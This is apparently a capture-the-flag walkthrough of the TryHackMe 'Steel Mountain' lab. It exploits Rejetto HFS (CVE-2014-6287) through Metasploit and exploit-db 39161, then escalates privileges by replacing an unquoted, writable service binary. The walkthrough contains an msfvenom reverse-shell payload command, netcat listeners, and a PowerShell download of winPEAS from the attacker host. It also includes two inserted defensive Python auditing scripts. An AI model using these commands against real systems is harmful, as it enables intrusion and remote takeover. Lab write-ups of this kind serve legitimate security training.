TryHackMe Writeup: Steel Mountain

PwnPalace
Jan 31, 2021

First, we start off with simple enumeration

nmap -sC -sV -Pn 10.10.103.240

Nmap scans can take a while, so we have a little extra time to do some manual enumeration. With that said, let’s see if this server is set up as a webserver by checking the common web ports 80, 8080 and 443.

Port 80 looks like a standard web site

Port 8080 appears to be a file server

Now in the first screenshot (port 80), we see an “Employee of the month”. This is also the first question that appears on TryHackMe. Since there doesn’t appear to be any information other than the photo on the site, let’s check the page source to see if the image is named after this mysterious person.

Hmmmm… could it be Bill Harper? Yes, yes it is!

The second question is asking what other port a web server is running on. Our quick pre-nmap check showed port 8080 was running a file server. So we will enter 8080.

The next question is asking what file server is running. A quick glance at the page shows “HTTPFileServer 2.3”.

Since that clearly isn’t the answer, we click the highlighted link at the bottom and it takes us to a “rejetto http file server” site.

Let’s input that answer and move on.

Now before we go any further, let’s check the results of the nmap scan we launched earlier

It appears that SMB and RDP are also open. This might come in handy later! But for now, let’s go ahead and fire up Metasploit. We are gonna do a quick check and see if there’s a module for the file server.

Hmmm…

Ok, let’s go ahead and configure and run this, since it seems promising and appears to match the software that is running.

set RHOSTS 10.10.103.240

set LHOST 10.9.240.85

set RPORT 8080

set LPORT 4444

Bombs away!

Annnnnnddddd BOOOMM!!

Looks like we have a low privileged shell under “Bill’s” UID

So we should have enough info to complete the next two questions. The CVE is CVE-2014-6287. We got this by typing the following into MSF:

info exploit/windows/http/rejetto_hfs_exec

The next question asks what the user flag is. So we will navigate through Bill’s user folders and try to locate the file.

cd C:\Users\bill\*

We find a user.txt file on Bill’s Desktop. So we read it and discover the following:

Let’s enter that info as a flag and move on.

The next task is asking us to download a set of PowerShell scripts and upload the “exploit” to the target machine. So after downloading, I loaded Meterpreter’s “powershell” script, then uploaded and ran the PowerUp file.

We will now load the powershell shell and run the script

powershell_shell

. .\PowerUp.ps1

Invoke-AllChecks

The next question asks what service shows up as an unquoted service path vulnerability and also has CanRestart set to True. Looks like it’s the AdvancedSystemCareService9 service
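What that finding means from the defender's side, as an added example (not code from the writeup or from PowerUp): the check below flags unquoted ImagePath values that contain spaces, lists the shorter program names Windows tries before the real binary, the directories whose ACLs therefore need review, and the quoted value that removes the ambiguity. The function names and all sample services except the first path are assumptions made for illustration.

```python
import ntpath
import re

# Constructed sample of (service name, ImagePath) pairs. Only the first path
# appears in the writeup; the other three are made up for illustration.
SERVICES = [
    ("AdvancedSystemCareService9",
     r"C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe"),
    ("QuotedSvc", r'"C:\Program Files\Vendor App\svc.exe" -k run'),
    ("NoSpaceSvc", r"C:\Windows\System32\svchost.exe -k netsvcs"),
    ("SpaceInArgsOnly", r"C:\Tools\agent.exe --config C:\Tools\agent conf.ini"),
]

# Shortest prefix ending in .exe that is followed by whitespace or end of string.
EXE_RE = re.compile(r"^(.*?\.exe)(\s.*)?$", re.IGNORECASE)


def audit_image_path(image_path):
    """Return None when the path is unambiguous, else what to review and fix."""
    path = image_path.strip()
    if path.startswith('"'):
        return None                      # already quoted
    match = EXE_RE.match(path)
    exe, args = (match.group(1), (match.group(2) or "").strip()) if match else (path, "")
    if " " not in exe:
        return None                      # spaces only in the arguments, if any
    # Windows tries each space-delimited prefix as a program name, left to right.
    parts = exe.split(" ")
    tried_first = [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))]
    return {
        "tried_first": tried_first,
        # Directories where a non-admin must not be able to create files.
        "review_dirs": sorted({ntpath.dirname(p) for p in tried_first}),
        # Corrected ImagePath value: quote the executable, keep the arguments.
        "fixed": f'"{exe}"' + (f" {args}" if args else ""),
    }


def flagged_services(services):
    """Names of services whose ImagePath needs quoting."""
    return [name for name, path in services if audit_image_path(path)]


if __name__ == "__main__":
    for name, path in SERVICES:
        finding = audit_image_path(path)
        if finding:
            print(name, finding["review_dirs"], finding["fixed"], sep="\n  ")
```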

The next part is kind of tricky. The TryHackMe tutorial says to create a payload using msfvenom to replace the binary and name it “Advanced.exe”. This won’t work, as the name of the actual binary is ASCService.exe. So we will use that as the name instead

msfvenom -p windows/shell_reverse_tcp LHOST=10.9.240.85 LPORT=4443 -f exe -o ASCService.exe

Now set up a netcat listener to “catch” the shell

nc -nvlp 4443

Next, we will go into our current meterpreter session, drop into a shell and stop the current service

Then we will upload our malicious file and restart the service

Uh oh, that error doesn’t look good…. Let’s check our netcat listener

Phew, we’re good! Now let’s read the root flag

#WINNING

Task 4

So at this point, I had walked away for a minute, only to return to an expired machine. So for the rest of the walkthrough, the IP address of the target will now be 10.10.227.39

For this task, it is essentially asking you to do the same thing, sans Metasploit. We begin by exploiting the same CVE, but using an exploit given by TryHackMe

https://www.exploit-db.com/exploits/39161

In addition to downloading that, we also need a netcat binary found here:

https://github.com/andrew-d/static-binaries/blob/master/binaries/windows/x86/ncat.exe

We also need a webserver to serve up the file. If you have Apache installed, you can use that. I, however, will be using Python’s SimpleHTTPServer. Open one terminal window, navigate to the ncat file you downloaded, rename it to nc.exe and start the server.

python3 -m http.server 80

Next, set up a listener in a separate window

nc -nvlp 1337

Modify the exploit to include your IP and the port your listener is listening on

Now run the exploit at least twice. If successful, you should now have a shell!

Now, since we are going to use WinPEAS to enumerate the system, let’s go ahead and move that webserver we started to the directory where WinPEAS is stored

cd /root/Desktop/tools/privilege-escalation-awesome-scripts-suite/winPEAS/winPEASexe/winPEAS/bin/x86/Release

python3 -m http.server 80

Now on the target shell we spawned, run:

powershell -c wget "http://10.9.240.85/winPEAS.exe" -outfile "winpeas.exe"

Once run, we should see that we have Write/Create perms on the same service area that we exploited earlier

C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
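The same permission finding can be confirmed and tracked from the defender's side by reviewing the ACL on the service binary. The following is an added example, not part of the original writeup or of WinPEAS: it parses text in the layout `icacls` prints and reports non-administrative principals holding write-capable rights. The ACL sample, the host name EXAMPLEHOST and the function names are constructed for illustration.

```python
import re

# Constructed sample in the layout icacls prints. The path is the one from the
# writeup; the host name and the ACL entries are made up for illustration.
PATH = r"C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe"
ICACLS_OUTPUT = PATH + r""" EXAMPLEHOST\bill:(I)(RX,W)
    NT AUTHORITY\SYSTEM:(I)(F)
    BUILTIN\Administrators:(I)(F)
    BUILTIN\Users:(I)(RX)
    EXAMPLEHOST\guest:(DENY)(W)

Successfully processed 1 files; Failed processing 0 files
"""

TRUSTED = {r"NT AUTHORITY\SYSTEM", r"BUILTIN\Administrators",
           r"NT SERVICE\TrustedInstaller"}
INHERIT_FLAGS = {"I", "OI", "CI", "IO", "NP"}
# Rights that let a principal modify or replace the file, or rewrite its ACL.
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "GA", "GW", "WDAC", "WO"}


def parse_allow_aces(path, output):
    """Return [(principal, rights)] for the allow entries in icacls output."""
    aces = []
    for line in output.splitlines():
        line = line.strip()
        if line.startswith(path):        # first entry shares a line with the path
            line = line[len(path):].strip()
        principal, sep, rest = line.partition(":(")
        if not sep:
            continue                     # blank line or the summary footer
        groups = [set(g.split(",")) for g in re.findall(r"\(([^)]*)\)", "(" + rest)]
        if {"DENY"} in groups:
            continue                     # deny entries grant nothing
        rights = set().union(*(g for g in groups if not g <= INHERIT_FLAGS))
        aces.append((principal, rights))
    return aces


def risky_writers(path, output):
    """Principals outside TRUSTED that can write to the service binary."""
    return [(p, sorted(r & WRITE_RIGHTS)) for p, r in parse_allow_aces(path, output)
            if p not in TRUSTED and r & WRITE_RIGHTS]


if __name__ == "__main__":
    for principal, rights in risky_writers(PATH, ICACLS_OUTPUT):
        print(f"{principal} can modify {PATH}: {','.join(rights)}")
```

An empty result for every service binary and its parent directories is the state to aim for; any principal listed should have its write access removed.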

We can generate a new msfvenom payload, or use the one created previously to run on port 4443. I will use that one.

First, let’s create a netcat listener to catch our shell

nc -nvlp 4443

Starting on Bill’s desktop, we are going to upload our payload

Now stop the current service

And copy and overwrite the current service with our payload and restart the service

We should now have r00t!
